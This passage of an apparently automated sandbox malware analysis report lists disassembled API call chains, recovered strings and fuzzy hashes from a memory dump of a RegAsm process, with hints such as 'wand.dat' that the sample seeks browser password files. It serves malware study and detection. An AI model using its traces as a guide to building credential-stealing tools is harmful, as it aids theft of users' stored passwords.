                            • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                          • memset.MSVCRT ref: 0040C439
                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                          • _wcsupr.MSVCRT ref: 0040C481
                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                          • memset.MSVCRT ref: 0040C4D0
                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                          • String ID:
                          • API String ID: 4131475296-0
                          • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                          • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                          • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                          • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                          APIs
                          • memset.MSVCRT ref: 004116FF
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                            • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                          • API String ID: 2618321458-3614832568
                          • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                          • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                          • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                          • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: AttributesFilefreememset
                          • String ID:
                          • API String ID: 2507021081-0
                          • Opcode ID: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                          • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                          • Opcode Fuzzy Hash: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                          • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                          APIs
                          • AreFileApisANSI.KERNEL32 ref: 004174FC
                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                          • malloc.MSVCRT ref: 00417524
                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                          • free.MSVCRT ref: 00417544
                          • free.MSVCRT ref: 00417562
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ByteCharMultiWidefree$ApisFilemalloc
                          • String ID:
                          • API String ID: 4131324427-0
                          • Opcode ID: 57b08e0afea0ce6944352db5cfd1372888f4bdadf73f296c46880c7ddd44ae0d
                          • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                          • Opcode Fuzzy Hash: 57b08e0afea0ce6944352db5cfd1372888f4bdadf73f296c46880c7ddd44ae0d
                          • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                          APIs
                          • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                          • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                          • free.MSVCRT ref: 0041822B
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: PathTemp$free
                          • String ID: %s\etilqs_$etilqs_
                          • API String ID: 924794160-1420421710
                          • Opcode ID: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                          • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                          • Opcode Fuzzy Hash: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                          • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ErrorLastMessage_snwprintf
                          • String ID: Error$Error %d: %s
                          • API String ID: 313946961-1552265934
                          • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                          • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                          • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                          • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                          APIs
                          Strings
                          • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                          • unknown column "%s" in foreign key definition, xrefs: 00431858
                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                          • API String ID: 3510742995-272990098
                          • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                          • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                          • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                          • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                          APIs
                          • memset.MSVCRT ref: 0044A6EB
                          • memset.MSVCRT ref: 0044A6FB
                          • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                          • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: gj
                          • API String ID: 1297977491-4203073231
                          • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                          • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                          • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                          • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                          APIs
                          • AreFileApisANSI.KERNEL32 ref: 00417497
                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                          • malloc.MSVCRT ref: 004174BD
                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                          • free.MSVCRT ref: 004174E4
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$ApisFilefreemalloc
                          • String ID:
                          • API String ID: 4053608372-0
                          • Opcode ID: d5ff2a264155eb9e3ce85c6bda5726e1366a88793ef295ade9d945fa0d444da7
                          • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                          • Opcode Fuzzy Hash: d5ff2a264155eb9e3ce85c6bda5726e1366a88793ef295ade9d945fa0d444da7
                          • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                          APIs
                          • GetParent.USER32(?), ref: 0040D453
                          • GetWindowRect.USER32(?,?), ref: 0040D460
                          • GetClientRect.USER32(00000000,?), ref: 0040D46B
                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Window$Rect$ClientParentPoints
                          • String ID:
                          • API String ID: 4247780290-0
                          • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                          • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                          • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                          • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                          APIs
                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                          • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                          • memset.MSVCRT ref: 004450CD
                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                            • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                          • CloseHandle.KERNEL32(00000000), ref: 004450F7
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                          • String ID:
                          • API String ID: 1471605966-0
                          • Opcode ID: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                          • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                          • Opcode Fuzzy Hash: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                          • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                          APIs
                          • wcscpy.MSVCRT ref: 0044475F
                          • wcscat.MSVCRT ref: 0044476E
                          • wcscat.MSVCRT ref: 0044477F
                          • wcscat.MSVCRT ref: 0044478E
                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                            • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                            • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                          • String ID: \StringFileInfo\
                          • API String ID: 102104167-2245444037
                          • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                          • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                          • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                          • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                          APIs
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                          • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                          • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                          • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                          APIs
                          • memset.MSVCRT ref: 004100FB
                          • memset.MSVCRT ref: 00410112
                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                          • _snwprintf.MSVCRT ref: 00410141
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$_snwprintf_wcslwrwcscpy
                          • String ID: </%s>
                          • API String ID: 3400436232-259020660
                          • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                          • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                          • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                          • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                          APIs
                          • memset.MSVCRT ref: 0040D58D
                          • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                          • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ChildEnumTextWindowWindowsmemset
                          • String ID: caption
                          • API String ID: 1523050162-4135340389
                          • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                          • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                          • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                          • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                          APIs
                            • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                            • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                          • CreateFontIndirectW.GDI32(?), ref: 00401156
                          • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                          • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                          • String ID: MS Sans Serif
                          • API String ID: 210187428-168460110
                          • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                          • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                          • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                          • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                          APIs
                          • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                          • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                          • memcmp.MSVCRT ref: 0041D8CB
                          • memcmp.MSVCRT ref: 0041D913
                          • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpy$memcmp
                          • String ID:
                          • API String ID: 3384217055-0
                          • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                          • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                          • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                          • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                          APIs
                          • memset.MSVCRT ref: 0040560C
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                            • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                          • String ID: *.*$dat$wand.dat
                          • API String ID: 2618321458-1828844352
                          • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                          • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                          • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                          • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                          APIs
                          • memset.MSVCRT ref: 00412057
                            • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                          • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                          • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                          • GetKeyState.USER32(00000010), ref: 0041210D
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ExecuteMenuMessageSendShellStateStringmemset
                          • String ID:
                          • API String ID: 3550944819-0
                          • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                          • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                          • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                          • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                          APIs
                          • free.MSVCRT ref: 0040F561
                          • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                          • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpy$free
                          • String ID: g4@
                          • API String ID: 2888793982-2133833424
                          • Opcode ID: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                          • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                          • Opcode Fuzzy Hash: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                          • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                          APIs
                          • memset.MSVCRT ref: 004144E7
                            • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                            • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                          • memset.MSVCRT ref: 0041451A
                          • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                          • String ID:
                          • API String ID: 1127616056-0
                          • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                          • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                          • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                          • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                          APIs
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                          • malloc.MSVCRT ref: 00417459
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                          • free.MSVCRT ref: 0041747F
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$freemalloc
                          • String ID:
                          • API String ID: 2605342592-0
                          • Opcode ID: 04ed014176e6e25a75c769d411d0e5b4418e4c479d680d12870536ad94e91e4d
                          • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                          • Opcode Fuzzy Hash: 04ed014176e6e25a75c769d411d0e5b4418e4c479d680d12870536ad94e91e4d
                          • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                          • RegisterClassW.USER32(?), ref: 00412428
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                          • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
